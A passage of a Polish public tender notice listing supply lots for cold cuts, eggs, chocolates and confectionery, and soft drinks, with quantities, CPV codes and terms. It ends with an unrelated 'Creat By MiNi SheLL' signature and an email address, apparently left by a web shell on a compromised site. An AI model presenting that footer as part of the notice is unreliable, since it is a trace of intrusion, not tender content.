10	Filet z udźca z kurczaka, bez skóry - świeży	100-160g	kg	100				
11	Filet z udźca z kurczaka, ze skórą - świeży	120 - 180g	kg	145				
12	Udziec z kurczaka z kością - świeży	150-180g	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> DOSTAWA WĘDLIN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


Lp	Nazwa artykułu	Nazwa własna#	

Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Baleron gotowany		kg	55				
2	Blok drobiowy 		kg	90				
3	Blok wieprzowy 		kg	120				
4	Boczek rolowany faszerowany		kg	65				
5	Boczek wędzony surowy, paski bez kości, 		kg	160				
6	Filet z indyka wędzony, pieczony - płat		kg	30				
7	Kiełbasa biała parzona, wieprzowa 		kg	90				
8	Kiełbasa wieprzowa grubo mielona, podsuszana -kanapkowa 		kg	90				
9	Kiełbasa parówkowa wieprzowa 		kg	200				
10	Kiełbasa wieprzowa surowa, wędzona		kg	30				
11	Kiełbasa wieprzowa swojska pieczona - cienka		kg	150				
12
	Kiełbasa wieprzowa grubo mielona, parzona - kanapkowa 		kg	110				
13	Kiełbasa wieprzowa szynkowa		kg	70				
14	Kiełbasa śląska drobiowa		kg	150				
15	Kiełbasa śląska wieprzowa		kg	90				
16	Kiełbasa toruńska		kg	90				
17	Kiełbasa zwyczajna wieprzowa 		kg	110				
18	Kiełbaski wieprzowe z serem		kg	15				
19	Krupniok śląski		kg	70				
20	Bułczanka		kg	50				
21	Metka wieprzowa grubo mielona,  podwędzana		kg	70				
22	Metka smakowa (cebulowa, tatarska, łososiowa, itp)		kg	50				
23	Mielonka wieprzowe		kg	60				
24	Mortadela wieprzowa		kg	105				
25	Ogonówka parzona		kg	100				
26	Parówki drobiowe		kg	300				
27	Parówki śląskie wieprzowe 		kg	160				
28	Pasztetowa popularna		kg	45				
29	Pasztetowa podwędzana		kg	60				
30	Polędwica sopocka 		kg	70				
31	Polędwica z indyka		kg	50				
32	Rolada drobiowa faszerowana 		kg	100				
33	Salami wieprzowe szlachetne		kg	7				
34	Salceson jasny		kg	60				
35	Salceson ozorkowy		kg	70				
36	Szynka drobiowa 		kg	90				
37	Szynka gotowana wieprzowa		kg	60				
38	Szynka konserwowa wieprzowa		kg	50				
39	Szynka wieprzowa w galarecie z warzywami		kg	45				
40	Szynka wieprzowa
(wiejska, swojska itp.) 		kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> DOSTAWA JAJ KURZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


Lp.	Nazwa artykułu	Sugerowana
waga jajka	Jm	Orientacyjna ilość
Zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Jaja kurze	63g-73g (L)	szt	14 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> DOSTAWA CZEKOLAD I WYROBÓW CUKIERNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna
Ilość zamówienia*
	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Biszkopty	100-500g	kg	10				
2	Biszkopty 	1000-3000g	kg	30				
3	Bombonierka - czekoladki nadziewane 	100-200g	kg	12				
4	Cukierki czekoladowe 
(typu buławki, michałki lub równoważne)	luz	kg	8				
5	Ciastka maślane 	800-2500g	kg	5				
6	Ciastka deserowe (kakaowe, z cukrem, z kokosem itp.)	800-2500g	kg	25				
7	Ciastka deserowe oblewane czekoladą	800-2500g	kg	5				
8	Ciasteczka deserowe 
z nadzieniem owocowym, kremowym	800-2500g	kg	6				
9	Pierniki nadziewane
w czekoladzie	800-2500g	kg	8				
10	Biszkopty z galaretką 
w czekoladzie	800-1000g	kg	4				
11	Galaretka w czekoladzie	1000g	kg	8				
12	Praliny nadziewane 
(min. 40%masy kakaowej)	1000g	kg	3				
13	Czekolada mleczna 
(min.30% masy kakaowej)	100g	szt.	60				
14	Ciastka bez dodatku cukru 	70g-150g	kg	11				
15	Wafelki bez dodatku cukru	70-150g	kg	3				
16	Mieszanka czekoladowa-opakowanie świąteczne	250-350g	kg	37				
17	Kostka marcepanowo-piernikowa z galaretką 
w czekoladzie	100-150g	kg	16				
18	Pierniki w czekoladzie 
(serca, gwiazdki, precelki)	400-500g	kg	55				
19	Czekolada mleczna nadziewana - opakowanie świąteczne 
(min.30% masy kakaowej)	100g	szt.	110				
20	Czekolada mleczna, deserowa bez dodatku cukru	100g	szt.	70				
21	Mikołaj świąteczny z czekolady mlecznej (min.30% masy kakaowej)	60-100g	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> DOSTAWA NAPOJÓW BEZALKOHOLOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Napoje owocowe pasteryzowane
niegazowane 
( min. 25% soku )	1000 -2000ml	l	300				
2	Soczki owocowo-warzywne 100% przecierowe, 	250-330ml	l	180				
3	Soki owocowo - warzywne 100% przecierowe, 	750-1000ml	l	250				
4	Syrop wysokosłodzony	330-500ml	l	20				
5	Woda mineralna gazowowana/niegazowana	1500 ml	szt	20				
7	Piwo ciemne bezalkoholowe	400 - 500ml	l	4				
8	Soki owocowe 100%	1000ml	l	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com